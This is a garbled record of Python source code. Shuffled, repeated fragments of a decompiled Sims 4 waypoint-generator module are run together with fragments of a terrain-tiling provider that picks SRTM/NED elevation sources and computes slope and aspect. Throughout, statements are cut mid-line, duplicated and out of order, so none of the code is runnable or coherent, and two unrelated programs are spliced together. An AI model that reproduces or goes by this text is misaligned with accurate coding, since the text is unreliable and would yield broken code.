(tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)] #", "{'waypoint_graph':TunableWaypointGraphSnippet(description='\\n Defines the waypoints and connections between them.\\n '), 'starting_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the", "SingleSimResolver(self._sim) if self.ending_waypoint is not None: ending_waypoint, _ = self.ending_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) else:", "Python bytecode 3.7 (3394) # Decompiled from: Python 3.7.9 
(tags/v3.7.9:13c94747c7, Aug 17 2020,", "self._context.sim resolver = SingleSimResolver(self._sim) self._starting_waypoint, self._start_constraint = self.starting_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) def get_start_constraint(self): return", "18:58:18) [MSC v.1900 64 bit (AMD64)] # Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\routing\\waypoints\\waypoint_generator_connected_points.py # Compiled", "2**32: 3643 bytes import sims4 from event_testing.resolver import SingleSimResolver from routing.waypoints.tunable_waypoint_graph import TunableWaypointGraphSnippet,", "self._starting_waypoint prev_waypoint = None num_visited = 0 while num_visited < self.max_waypoints or self.max_waypoints", "of source mod 2**32: 3643 bytes import sims4 from event_testing.resolver import SingleSimResolver from", "< self.max_waypoints or self.max_waypoints == 0: connections = self.waypoint_graph.connections.get(cur_waypoint, None) if connections is", "and connections between them.\\n '), 'starting_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to start at", "is reached.\\n ', tunable_type=int, default=0, minimum=0, maximum=100)} def __init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs)", "if self.ending_waypoint is not None: ending_waypoint, _ = self.ending_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) else: ending_waypoint", "class _WaypointGeneratorConnectedPoints(_WaypointGeneratorBase): FACTORY_TUNABLES = {'waypoint_graph':TunableWaypointGraphSnippet(description='\\n Defines the waypoints and connections between them.\\n '),", "'), 'ending_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to end at (will choose one based", "None: ending_waypoint, _ = self.ending_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) else: ending_waypoint = None cur_waypoint =", "choose one based on the 
tests/weights).\\n '), 'max_waypoints':TunableRange(description='\\n The maximum number of waypoints", "resolver) def get_start_constraint(self): return self._start_constraint def get_waypoint_constraints_gen(self, routing_agent, waypoint_count): resolver = SingleSimResolver(self._sim) if", "the generator to start at (will choose one based on the tests/weights).\\n '),", "routing.waypoints.waypoint_generator import _WaypointGeneratorBase from sims4.tuning.tunable import TunableRange logger = sims4.log.Logger('WaypointGeneratorConnectedPoints', default_owner='miking') class _WaypointGeneratorConnectedPoints(_WaypointGeneratorBase):", "generator to end at (will choose one based on the tests/weights).\\n '), 'max_waypoints':TunableRange(description='\\n", "TunableRange logger = sims4.log.Logger('WaypointGeneratorConnectedPoints', default_owner='miking') class _WaypointGeneratorConnectedPoints(_WaypointGeneratorBase): FACTORY_TUNABLES = {'waypoint_graph':TunableWaypointGraphSnippet(description='\\n Defines the waypoints", "None num_visited = 0 while num_visited < self.max_waypoints or self.max_waypoints == 0: connections", "(will choose one based on the tests/weights).\\n '), 'max_waypoints':TunableRange(description='\\n The maximum number of", "self._start_constraint = self.starting_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) def get_start_constraint(self): return self._start_constraint def get_waypoint_constraints_gen(self, routing_agent, waypoint_count):", "3.7.4 # Python bytecode 3.7 (3394) # Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug", "on the tests/weights).\\n '), 'max_waypoints':TunableRange(description='\\n The maximum number of waypoints to visit. 
Set", "Size of source mod 2**32: 3643 bytes import sims4 from event_testing.resolver import SingleSimResolver", "connections defined in waypoint graph for waypoint id {}.', cur_waypoint) break new_waypoint, waypoint_constraint", "self._start_constraint def get_waypoint_constraints_gen(self, routing_agent, waypoint_count): resolver = SingleSimResolver(self._sim) if self.ending_waypoint is not None:", "resolver = SingleSimResolver(self._sim) self._starting_waypoint, self._start_constraint = self.starting_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) def get_start_constraint(self): return self._start_constraint", "graph for waypoint id {}.', cur_waypoint) break new_waypoint, waypoint_constraint = connections.choose(self.waypoint_graph, self._routing_surface, resolver,", "None cur_waypoint = self._starting_waypoint prev_waypoint = None num_visited = 0 while num_visited <", "the tests/weights).\\n '), 'ending_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to end at (will choose", "logger.warn('No connections defined in waypoint graph for waypoint id {}.', cur_waypoint) break new_waypoint,", "Compiled at: 2020-04-22 01:40:18 # Size of source mod 2**32: 3643 bytes import", "event_testing.resolver import SingleSimResolver from routing.waypoints.tunable_waypoint_graph import TunableWaypointGraphSnippet, TunableWaypointWeightedSet from routing.waypoints.waypoint_generator import _WaypointGeneratorBase from", "FACTORY_TUNABLES = {'waypoint_graph':TunableWaypointGraphSnippet(description='\\n Defines the waypoints and connections between them.\\n '), 'starting_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint", "from routing.waypoints.waypoint_generator import _WaypointGeneratorBase from sims4.tuning.tunable import TunableRange logger = sims4.log.Logger('WaypointGeneratorConnectedPoints', default_owner='miking') class", "= self._context.sim resolver = 
SingleSimResolver(self._sim) self._starting_waypoint, self._start_constraint = self.starting_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) def get_start_constraint(self):", "graph for waypoint id {}.', prev_waypoint) break num_visited += 1 yield waypoint_constraint if", "sims4 from event_testing.resolver import SingleSimResolver from routing.waypoints.tunable_waypoint_graph import TunableWaypointGraphSnippet, TunableWaypointWeightedSet from routing.waypoints.waypoint_generator import", "for the generator to end at (will choose one based on the tests/weights).\\n", "<gh_stars>0 # uncompyle6 version 3.7.4 # Python bytecode 3.7 (3394) # Decompiled from:", "tests/weights).\\n '), 'ending_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to end at (will choose one", "{}.', cur_waypoint) break new_waypoint, waypoint_constraint = connections.choose(self.waypoint_graph, self._routing_surface, resolver, prev_waypoint) prev_waypoint = cur_waypoint", "from event_testing.resolver import SingleSimResolver from routing.waypoints.tunable_waypoint_graph import TunableWaypointGraphSnippet, TunableWaypointWeightedSet from routing.waypoints.waypoint_generator import _WaypointGeneratorBase", "(tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)] # Embedded file", "prev_waypoint = None num_visited = 0 while num_visited < self.max_waypoints or self.max_waypoints ==", "self._routing_surface, resolver, prev_waypoint) prev_waypoint = cur_waypoint cur_waypoint = new_waypoint if cur_waypoint is None:", "routing.waypoints.tunable_waypoint_graph import TunableWaypointGraphSnippet, TunableWaypointWeightedSet from routing.waypoints.waypoint_generator import _WaypointGeneratorBase from sims4.tuning.tunable import TunableRange logger", "bit (AMD64)] # Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\routing\\waypoints\\waypoint_generator_connected_points.py # Compiled at: 2020-04-22 01:40:18 #", 
"= SingleSimResolver(self._sim) if self.ending_waypoint is not None: ending_waypoint, _ = self.ending_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver)", "None) if connections is None: logger.warn('No connections defined in waypoint graph for waypoint", "bytecode 3.7 (3394) # Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18)", "new_waypoint if cur_waypoint is None: logger.warn('No connection chosen from waypoint graph for waypoint", "waypoint graph for waypoint id {}.', cur_waypoint) break new_waypoint, waypoint_constraint = connections.choose(self.waypoint_graph, self._routing_surface,", "= None cur_waypoint = self._starting_waypoint prev_waypoint = None num_visited = 0 while num_visited", "file name: T:\\InGame\\Gameplay\\Scripts\\Server\\routing\\waypoints\\waypoint_generator_connected_points.py # Compiled at: 2020-04-22 01:40:18 # Size of source mod", "bytes import sims4 from event_testing.resolver import SingleSimResolver from routing.waypoints.tunable_waypoint_graph import TunableWaypointGraphSnippet, TunableWaypointWeightedSet from", "source mod 2**32: 3643 bytes import sims4 from event_testing.resolver import SingleSimResolver from routing.waypoints.tunable_waypoint_graph" ]
[]
[ "0) ds.GetRasterBand(1).SetNoDataValue(-9999) return ds def calculate_slope_aspect(elevation, xres, yres, z=1.0): \"\"\" Return a pair", "__init__(self, layer, demdir, tmpdir=None, source='srtm-ned'): self.tmpdir = tmpdir self.demdir = demdir self.source =", "xres); y = ((window[6] + window[7] + window[7] + window[8]) \\ - (window[0]", "SRTM3, VFP, Worldwide from ModestMaps.Core import Coordinate from TileStache.Geography import SphericalMercator from TileStache.Core", "resample = gdal.GRA_CubicSpline gdal.ReprojectImage(ds_dem, composite_ds, ds_dem.GetProjection(), composite_ds.GetProjection(), resample) ds_dem = None # #", "slope = pi/2 - numpy.arctan(numpy.sqrt(x*x + y*y)) # in radians counterclockwise, from -pi", "(row, col) in product(range(3), range(3))] x = ((window[0] + window[3] + window[3] +", "in radians, from 0 for sheer face to pi/2 for flat ground. Aspect", "top = SRTM3, NED10m elif zoom >= NED10m.ideal_zoom: return [(NED10m, 1)] difference =", "float(bottom.ideal_zoom)) / difference return [(bottom, proportion), (top, 1 - proportion)] def make_empty_datasource(width, height,", "\"\"\" Return an instance of SlopeAndAspect for requested area. \"\"\" assert srs ==", "'tiff': raise Exception() return 'image/tiff', 'TIFF' def renderArea(self, width, height, srs, xmin, ymin,", "osr.CoordinateTransformation(webmerc_sref, module.sref) # get a lat/lon bbox buffered by one pixel on all", "returned in radians, counterclockwise from -pi at north around to pi. Logic here", "def crop(self, box): \"\"\" Returns a rectangular region from the current image. Box", "proportion)] def make_empty_datasource(width, height, xform, wkt, tmpdir): ''' ''' driver = gdal.GetDriverByName('GTiff') handle,", "1) __import__(modname) module = modules[modname] _func = eval(objname, module.__dict__) if _func is None:", "for later alpha-blending. 
# do_blending = bool(proportion_complete > 0 and proportion < 1)", "Metatile(), tile_height=size) self.provider = Provider(self, demdir, tmpdir, source) def name(self): return '.' class", "for generating tiles of DEM slope and aspect data. Source parameter can be", "(maxlon - minlon) / ds_dem.GetGeoTransform()[1] area_pixels = (xmax - xmin) / composite_ds.GetGeoTransform()[1] if", "knows only how to save two-band 8-bit GeoTIFFs. See http://tilestache.org/doc/#custom-providers for information on", "current image. Box is a 4-tuple with left, upper, right, and lower pixels.", "= osr.CoordinateTransformation(webmerc_sref, module.sref) # get a lat/lon bbox buffered by one pixel on", "!= 'TIFF': raise Exception('File format other than TIFF for slope and aspect: \"%s\"'", "assert sum([proportion for (mod, proportion) in providers]) == 1.0 # # Prepare information", "\"\"\" from math import pi, sin, cos from os import unlink, close from", "window[6]) \\ - (window[2] + window[5] + window[5] + window[8])) \\ / (8.0", "geographic information. \"\"\" self.tmpdir = tmpdir self.slope = slope self.aspect = aspect self.w,", "\"\"\" width, height = elevation.shape[0] - 2, elevation.shape[1] - 2 window = [z", "SRTM1, NED10m # SRTM1 looks terrible bottom, top = SRTM3, NED10m elif zoom", "(8.0 * yres); # in radians, from 0 to pi/2 slope = pi/2", "name(self): return '.' class Provider: \"\"\" TileStache provider for generating tiles of DEM", "os import unlink, close from itertools import product from tempfile import mkstemp from", "tmpdir self.demdir = demdir self.source = source def getTypeByExtension(self, ext): if ext.lower() !=", "to pi/2 slope = pi/2 - numpy.arctan(numpy.sqrt(x*x + y*y)) # in radians counterclockwise,", "((window[6] + window[7] + window[7] + window[8]) \\ - (window[0] + window[1] +", "on a path. Example funcpath: \"Module.Submodule:Function\". 
\"\"\" modname, objname = funcpath.split(':', 1) __import__(modname)", "source DEM and output dem_samples = (maxlon - minlon) / ds_dem.GetGeoTransform()[1] area_pixels =", "for requested area. \"\"\" assert srs == webmerc_proj.srs # <-- good enough for", "# cubic looks better squeezing down resample = gdal.GRA_Cubic else: # cubic spline", "providers = load_func_path(self.source)(zoom) assert sum([proportion for (mod, proportion) in providers]) == 1.0 #", "save_slope_aspect # used to prevent clobbering in /vsimem/, see: # http://osgeo-org.1803224.n2.nabble.com/gdal-dev-Outputting-to-vsimem-td6221295.html vsimem_counter =", "# do_blending = bool(proportion_complete > 0 and proportion < 1) if do_blending: composite_without", "proportion elevation = composite_ds.ReadAsArray() unlink(composite_ds.GetFileList()[0]) composite_ds = None # # Calculate and save", "cache = Disk(tiledir, dirs='safe') config = Configuration(cache, '.') Layer.__init__(self, config, SphericalMercator(), Metatile(), tile_height=size)", "SRTM1 or SRTM3, and the proportions must all add up to one. Return", "= (xmax - xmin) / width yres = (ymin - ymax) / height", "pi aspect = numpy.arctan2(x, y) return slope, aspect def load_func_path(funcpath): \"\"\" Load external", "yet implemented! \"\"\" raise NotImplementedError() def choose_providers_srtm(zoom): \"\"\" Return a list of data", "module such as SRTM1 or SRTM3, and the proportions must all add up", "in module.datasources(*ds_args): # estimate the raster density across source DEM and output dem_samples", "self.source = source def getTypeByExtension(self, ext): if ext.lower() != 'tiff': raise Exception() return", "yres); # in radians, from 0 to pi/2 slope = pi/2 - numpy.arctan(numpy.sqrt(x*x", "data. Intended for use in hillup-seed.py script for preparing a tile directory. \"\"\"", "\"\"\" TileStache response object with PIL-like save() and crop() methods. 
This object knows", "NED100m bottom, top = NED1km, NED100m elif zoom == NED100m.ideal_zoom: return [(NED100m, 1)]", "< zoom and zoom < NED10m.ideal_zoom: #bottom, top = NED100m, NED10m bottom, top", "in radians, from 0 to pi/2 slope = pi/2 - numpy.arctan(numpy.sqrt(x*x + y*y))", "elif zoom == SRTM1.ideal_zoom: #return [(SRTM1, 1)] # SRTM1 looks terrible bottom, top", "for given zoom level. Each data source is a module such as SRTM1", "object interacts with TileStache. \"\"\" def __init__(self, layer, demdir, tmpdir=None, source='srtm-ned'): self.tmpdir =", "- xres, xres, 0, ymax - yres, 0, yres # # Reproject and", "* proportion_without composite_ds.GetRasterBand(1).WriteArray(composite_with, 0, 0) proportion_complete += proportion elevation = composite_ds.ReadAsArray() unlink(composite_ds.GetFileList()[0]) composite_ds", "better squeezing down resample = gdal.GRA_Cubic else: # cubic spline looks better stretching", "must all add up to one. Return list has either one or two", "has either one or two items. \"\"\" if zoom <= NED1km.ideal_zoom: return [(NED1km,", "yres, z=1.0): \"\"\" Return a pair of arrays 2 pixels smaller than the", "elevation = composite_ds.ReadAsArray() unlink(composite_ds.GetFileList()[0]) composite_ds = None # # Calculate and save slope", "Prepare information for datasets of the desired extent and projection. # xres =", "for given zoom level. Each data source is a module such as NED10m", "a module such as NED10m or NED1km, and the proportions must all add", "from TileStache.Geography import SphericalMercator from TileStache.Core import Layer, Metatile from TileStache.Config import Configuration", "webmerc_proj = SphericalMercator() webmerc_sref = osr.SpatialReference() webmerc_sref.ImportFromProj4(webmerc_proj.srs) class SeedingLayer (Layer): \"\"\" Tilestache-compatible seeding", "object interacts with TileStache. 
\"\"\" def __init__(self, tmpdir, slope, aspect, wkt, xform): \"\"\"", "slope and aspect: \"%s\"' % format) save_slope_aspect(self.slope, self.aspect, self.wkt, self.xform, output, self.tmpdir) def", "for datasets of the desired extent and projection. # xres = (xmax -", "for (row, col) in product(range(3), range(3))] x = ((window[0] + window[3] + window[3]", "# # Reproject and merge DEM datasources into destination datasets. # driver =", "top = SRTM1, NED10m # SRTM1 looks terrible bottom, top = SRTM3, NED10m", "difference return [(bottom, proportion), (top, 1 - proportion)] def make_empty_datasource(width, height, xform, wkt,", "\"\"\" if format != 'TIFF': raise Exception('File format other than TIFF for slope", "destination datasets. # driver = gdal.GetDriverByName('GTiff') composite_ds = make_empty_datasource(width+2, height+2, buffered_xform, area_wkt, self.tmpdir)", "= gdal.GRA_Cubic else: # cubic spline looks better stretching out resample = gdal.GRA_CubicSpline", "cs2cs = osr.CoordinateTransformation(webmerc_sref, module.sref) # get a lat/lon bbox buffered by one pixel", "'.') Layer.__init__(self, config, SphericalMercator(), Metatile(), tile_height=size) self.provider = Provider(self, demdir, tmpdir, source) def", "provider for generating tiles of DEM slope and aspect data. Source parameter can", "-pi at north back to pi aspect = numpy.arctan2(x, y) return slope, aspect", "if self.source == 'srtm-ned': providers = choose_providers_srtm(zoom) elif self.source == 'ned-only': providers =", "(xmax - xmin) / composite_ds.GetGeoTransform()[1] if dem_samples > area_pixels: # cubic looks better", "for preparing tiled data. Intended for use in hillup-seed.py script for preparing a", "= 1 # # Set up some useful projections. # osr.UseExceptions() # <--", "bool(proportion_complete > 0 and proportion < 1) if do_blending: composite_without = composite_ds.ReadAsArray() ds_args", "input elevation array. 
Slope is returned in radians, from 0 for sheer face", "# <-- otherwise errors will be silent and useless. webmerc_proj = SphericalMercator() webmerc_sref", "slope self.aspect = aspect self.w, self.h = self.slope.shape self.wkt = wkt self.xform =", "self.demdir for ds_dem in module.datasources(*ds_args): # estimate the raster density across source DEM", "x = ((window[0] + window[3] + window[3] + window[6]) \\ - (window[2] +", "class SlopeAndAspect: \"\"\" TileStache response object with PIL-like save() and crop() methods. This", "= SRTM3, NED10m elif SRTM1.ideal_zoom < zoom and zoom < NED10m.ideal_zoom: #bottom, top", "or two items. \"\"\" if zoom <= SRTM3.ideal_zoom: return [(SRTM3, 1)] elif SRTM3.ideal_zoom", "[z * elevation[row:(row + height), col:(col + width)] for (row, col) in product(range(3),", "load_func_path(self.source)(zoom) assert sum([proportion for (mod, proportion) in providers]) == 1.0 # # Prepare", "region from the current image. Box is a 4-tuple with left, upper, right,", "\"\"\" Save a two-band GeoTIFF to output file-like object. \"\"\" if format !=", "for preparing a tile directory. \"\"\" def __init__(self, demdir, tiledir, tmpdir, source, size):", "[(bottom, proportion), (top, 1 - proportion)] def make_empty_datasource(width, height, xform, wkt, tmpdir): '''", "Example funcpath: \"Module.Submodule:Function\". \"\"\" modname, objname = funcpath.split(':', 1) __import__(modname) module = modules[modname]", "how the Provider object interacts with TileStache. \"\"\" def __init__(self, layer, demdir, tmpdir=None,", "- yres) # # Keep a version of the composite without the #", "silent and useless. webmerc_proj = SphericalMercator() webmerc_sref = osr.SpatialReference() webmerc_sref.ImportFromProj4(webmerc_proj.srs) class SeedingLayer (Layer):", "xmin, xres, 0, ymax, 0, yres return SlopeAndAspect(self.tmpdir, slope, aspect, area_wkt, tile_xform) class", "Return a list of data sources and proportions for given zoom level. 
Each", "looks better squeezing down resample = gdal.GRA_Cubic else: # cubic spline looks better", "if zoom <= NED1km.ideal_zoom: return [(NED1km, 1)] elif NED1km.ideal_zoom < zoom and zoom", "providers = [(Worldwide, 1)] else: providers = load_func_path(self.source)(zoom) assert sum([proportion for (mod, proportion)", "seeding layer for preparing tiled data. Intended for use in hillup-seed.py script for", "- xres, ymin + yres) maxlon, maxlat, z = cs2cs.TransformPoint(xmax + xres, ymax", "close(handle) ds = driver.Create(filename, width, height, 1, gdal.GDT_Float32) ds.SetGeoTransform(xform) ds.SetProjection(wkt) ds.GetRasterBand(1).WriteArray(numpy.ones((width, height), numpy.float32)", "numpy.arctan2(x, y) return slope, aspect def load_func_path(funcpath): \"\"\" Load external function based on", "numpy.float32) * -9999, 0, 0) ds.GetRasterBand(1).SetNoDataValue(-9999) return ds def calculate_slope_aspect(elevation, xres, yres, z=1.0):", "in hillup-seed.py script for preparing a tile directory. \"\"\" def __init__(self, demdir, tiledir,", "sources and proportions for given zoom level. Each data source is a module", "height = elevation.shape[0] - 2, elevation.shape[1] - 2 window = [z * elevation[row:(row", "two-band 8-bit GeoTIFFs. See http://tilestache.org/doc/#custom-providers for information on how the SlopeAndAspect object interacts", "save slope and aspect. # slope, aspect = calculate_slope_aspect(elevation, xres, yres) tile_xform =", "maxlon, maxlat, self.demdir for ds_dem in module.datasources(*ds_args): # estimate the raster density across", "utilities. \"\"\" from math import pi, sin, cos from os import unlink, close", "xres, yres) tile_xform = xmin, xres, 0, ymax, 0, yres return SlopeAndAspect(self.tmpdir, slope,", "tmpdir, slope, aspect, wkt, xform): \"\"\" Instantiate with array of slope and aspect,", "has either one or two items. 
\"\"\" if zoom <= SRTM3.ideal_zoom: return [(SRTM3,", "resample = gdal.GRA_Cubic else: # cubic spline looks better stretching out resample =", "else: providers = load_func_path(self.source)(zoom) assert sum([proportion for (mod, proportion) in providers]) == 1.0", ">= NED10m.ideal_zoom: return [(NED10m, 1)] difference = float(top.ideal_zoom) - float(bottom.ideal_zoom) proportion = 1.", "across source DEM and output dem_samples = (maxlon - minlon) / ds_dem.GetGeoTransform()[1] area_pixels", "SRTM3, NED10m elif SRTM1.ideal_zoom < zoom and zoom < NED10m.ideal_zoom: #bottom, top =", "at north back to pi aspect = numpy.arctan2(x, y) return slope, aspect def", "NED100m elif zoom == NED100m.ideal_zoom: return [(NED100m, 1)] elif NED100m.ideal_zoom < zoom and", "filename = mkstemp(dir=tmpdir, prefix='dem-tools-hillup-data-render-', suffix='.tif') close(handle) ds = driver.Create(filename, width, height, 1, gdal.GDT_Float32)", "squeezing down resample = gdal.GRA_Cubic else: # cubic spline looks better stretching out", "SRTM3.ideal_zoom: return [(SRTM3, 1)] elif SRTM3.ideal_zoom < zoom and zoom < SRTM1.ideal_zoom: #bottom,", "SRTM1.ideal_zoom < zoom and zoom < NED10m.ideal_zoom: #bottom, top = SRTM1, NED10m #", "cubic spline looks better stretching out resample = gdal.GRA_CubicSpline gdal.ReprojectImage(ds_dem, composite_ds, ds_dem.GetProjection(), composite_ds.GetProjection(),", "instance of SlopeAndAspect for requested area. \"\"\" assert srs == webmerc_proj.srs # <--", "for ds_dem in module.datasources(*ds_args): # estimate the raster density across source DEM and", "file-like object. \"\"\" if format != 'TIFF': raise Exception('File format other than TIFF", "window[1] + window[2])) \\ / (8.0 * yres); # in radians, from 0", "two items. 
\"\"\" if zoom <= SRTM3.ideal_zoom: return [(SRTM3, 1)] elif SRTM3.ideal_zoom <", "all sides minlon, minlat, z = cs2cs.TransformPoint(xmin - xres, ymin + yres) maxlon,", "\"\"\" if zoom <= NED1km.ideal_zoom: return [(NED1km, 1)] elif NED1km.ideal_zoom < zoom and", "preparing a tile directory. \"\"\" def __init__(self, demdir, tiledir, tmpdir, source, size): \"\"\"", "ds_dem.GetGeoTransform()[1] area_pixels = (xmax - xmin) / composite_ds.GetGeoTransform()[1] if dem_samples > area_pixels: #", "- minlon) / ds_dem.GetGeoTransform()[1] area_pixels = (xmax - xmin) / composite_ds.GetGeoTransform()[1] if dem_samples", "y) return slope, aspect def load_func_path(funcpath): \"\"\" Load external function based on a", "Return list has either one or two items. \"\"\" if zoom <= SRTM3.ideal_zoom:", "aspect. # slope, aspect = calculate_slope_aspect(elevation, xres, yres) tile_xform = xmin, xres, 0,", "can be \"srtm-ned\" (default) or \"ned-only\". See http://tilestache.org/doc/#custom-providers for information on how the", "is returned in radians, counterclockwise from -pi at north around to pi. Logic", "yres, 0, yres # # Reproject and merge DEM datasources into destination datasets.", "NED10m, NED100m, NED1km, SRTM1, SRTM3, VFP, Worldwide from ModestMaps.Core import Coordinate from TileStache.Geography", "and minimal geographic information. \"\"\" self.tmpdir = tmpdir self.slope = slope self.aspect =", "better stretching out resample = gdal.GRA_CubicSpline gdal.ReprojectImage(ds_dem, composite_ds, ds_dem.GetProjection(), composite_ds.GetProjection(), resample) ds_dem =", "numpy from .. 
import save_slope_aspect # used to prevent clobbering in /vsimem/, see:", "dirs='safe') config = Configuration(cache, '.') Layer.__init__(self, config, SphericalMercator(), Metatile(), tile_height=size) self.provider = Provider(self,", "for slope and aspect: \"%s\"' % format) save_slope_aspect(self.slope, self.aspect, self.wkt, self.xform, output, self.tmpdir)", "and output dem_samples = (maxlon - minlon) / ds_dem.GetGeoTransform()[1] area_pixels = (xmax -", "sheer face to pi/2 for flat ground. Aspect is returned in radians, counterclockwise", "self.tmpdir = tmpdir self.slope = slope self.aspect = aspect self.w, self.h = self.slope.shape", "TIFF for slope and aspect: \"%s\"' % format) save_slope_aspect(self.slope, self.aspect, self.wkt, self.xform, output,", "wkt self.xform = xform def save(self, output, format): \"\"\" Save a two-band GeoTIFF", "def renderArea(self, width, height, srs, xmin, ymin, xmax, ymax, zoom): \"\"\" Return an", "- ymax) / height area_wkt = webmerc_sref.ExportToWkt() buffered_xform = xmin - xres, xres,", "use in hillup-seed.py script for preparing a tile directory. \"\"\" def __init__(self, demdir,", "the # current layer applied for later alpha-blending. # do_blending = bool(proportion_complete >", "for sheer face to pi/2 for flat ground. 
Aspect is returned in radians,", "to prevent clobbering in /vsimem/, see: # http://osgeo-org.1803224.n2.nabble.com/gdal-dev-Outputting-to-vsimem-td6221295.html vsimem_counter = 1 # #", "def __init__(self, layer, demdir, tmpdir=None, source='srtm-ned'): self.tmpdir = tmpdir self.demdir = demdir self.source", "modname, objname = funcpath.split(':', 1) __import__(modname) module = modules[modname] _func = eval(objname, module.__dict__)", "'srtm-ned': providers = choose_providers_srtm(zoom) elif self.source == 'ned-only': providers = choose_providers_ned(zoom) elif self.source", "xres, yres, z=1.0): \"\"\" Return a pair of arrays 2 pixels smaller than", "window[2])) \\ / (8.0 * yres); # in radians, from 0 to pi/2", "'.' class Provider: \"\"\" TileStache provider for generating tiles of DEM slope and", "= composite_ds.ReadAsArray() * proportion_with composite_with += composite_without * proportion_without composite_ds.GetRasterBand(1).WriteArray(composite_with, 0, 0) proportion_complete", "\"ned-only\". See http://tilestache.org/doc/#custom-providers for information on how the Provider object interacts with TileStache.", "ground. Aspect is returned in radians, counterclockwise from -pi at north around to", "# Prepare information for datasets of the desired extent and projection. # xres", "< zoom and zoom < NED100m.ideal_zoom: #bottom, top = NED1km, NED100m bottom, top", "modules import NED10m, NED100m, NED1km, SRTM1, SRTM3, VFP, Worldwide from ModestMaps.Core import Coordinate", "\"\"\" assert srs == webmerc_proj.srs # <-- good enough for now if self.source", "providers: cs2cs = osr.CoordinateTransformation(webmerc_sref, module.sref) # get a lat/lon bbox buffered by one", "hillup-seed.py script for preparing a tile directory. 
\"\"\" def __init__(self, demdir, tiledir, tmpdir,", "< 1) if do_blending: composite_without = composite_ds.ReadAsArray() ds_args = minlon, minlat, maxlon, maxlat,", "SRTM3, NED10m elif zoom >= NED10m.ideal_zoom: return [(NED10m, 1)] difference = float(top.ideal_zoom) -", "def __init__(self, demdir, tiledir, tmpdir, source, size): \"\"\" \"\"\" cache = Disk(tiledir, dirs='safe')", "= (ymin - ymax) / height area_wkt = webmerc_sref.ExportToWkt() buffered_xform = xmin -", "and zoom < NED100m.ideal_zoom: #bottom, top = NED1km, NED100m bottom, top = NED1km,", "def getTypeByExtension(self, ext): if ext.lower() != 'tiff': raise Exception() return 'image/tiff', 'TIFF' def", "-pi at north around to pi. Logic here is borrowed from hillshade.cpp: http://www.perrygeo.net/wordpress/?p=7", "def load_func_path(funcpath): \"\"\" Load external function based on a path. Example funcpath: \"Module.Submodule:Function\".", "\"Module.Submodule:Function\". \"\"\" modname, objname = funcpath.split(':', 1) __import__(modname) module = modules[modname] _func =", "def name(self): return '.' class Provider: \"\"\" TileStache provider for generating tiles of", "a two-band GeoTIFF to output file-like object. \"\"\" if format != 'TIFF': raise", "mkstemp from sys import modules import NED10m, NED100m, NED1km, SRTM1, SRTM3, VFP, Worldwide", "script for preparing a tile directory. \"\"\" def __init__(self, demdir, tiledir, tmpdir, source,", "into destination datasets. # driver = gdal.GetDriverByName('GTiff') composite_ds = make_empty_datasource(width+2, height+2, buffered_xform, area_wkt,", "(zoom - float(bottom.ideal_zoom)) / difference return [(bottom, proportion), (top, 1 - proportion)] def", "Image import numpy from .. import save_slope_aspect # used to prevent clobbering in", "aspect def load_func_path(funcpath): \"\"\" Load external function based on a path. Example funcpath:", "float(bottom.ideal_zoom) proportion = 1. 
- (zoom - float(bottom.ideal_zoom)) / difference return [(bottom, proportion),", "source, size): \"\"\" \"\"\" cache = Disk(tiledir, dirs='safe') config = Configuration(cache, '.') Layer.__init__(self,", "1)] elif NED100m.ideal_zoom < zoom and zoom < NED10m.ideal_zoom: #bottom, top = NED100m,", "merge DEM datasources into destination datasets. # driver = gdal.GetDriverByName('GTiff') composite_ds = make_empty_datasource(width+2,", "config = Configuration(cache, '.') Layer.__init__(self, config, SphericalMercator(), Metatile(), tile_height=size) self.provider = Provider(self, demdir,", "SlopeAndAspect for requested area. \"\"\" assert srs == webmerc_proj.srs # <-- good enough", "prevent clobbering in /vsimem/, see: # http://osgeo-org.1803224.n2.nabble.com/gdal-dev-Outputting-to-vsimem-td6221295.html vsimem_counter = 1 # # Set", "than TIFF for slope and aspect: \"%s\"' % format) save_slope_aspect(self.slope, self.aspect, self.wkt, self.xform,", "one or two items. \"\"\" if zoom <= SRTM3.ideal_zoom: return [(SRTM3, 1)] elif", "ds = driver.Create(filename, width, height, 1, gdal.GDT_Float32) ds.SetGeoTransform(xform) ds.SetProjection(wkt) ds.GetRasterBand(1).WriteArray(numpy.ones((width, height), numpy.float32) *", "\\ / (8.0 * yres); # in radians, from 0 to pi/2 slope", "and crop() methods. This object knows only how to save two-band 8-bit GeoTIFFs.", "import pi, sin, cos from os import unlink, close from itertools import product", "zoom < NED10m.ideal_zoom: #bottom, top = SRTM1, NED10m # SRTM1 looks terrible bottom,", "calculate_slope_aspect(elevation, xres, yres, z=1.0): \"\"\" Return a pair of arrays 2 pixels smaller", "(xmax - xmin) / width yres = (ymin - ymax) / height area_wkt", "(top, 1 - proportion)] def choose_providers_ned(zoom): \"\"\" Return a list of data sources", "do_blending: proportion_with = proportion / (proportion_complete + proportion) proportion_without = 1 - proportion_with", "NED10m or NED1km, and the proportions must all add up to one. 
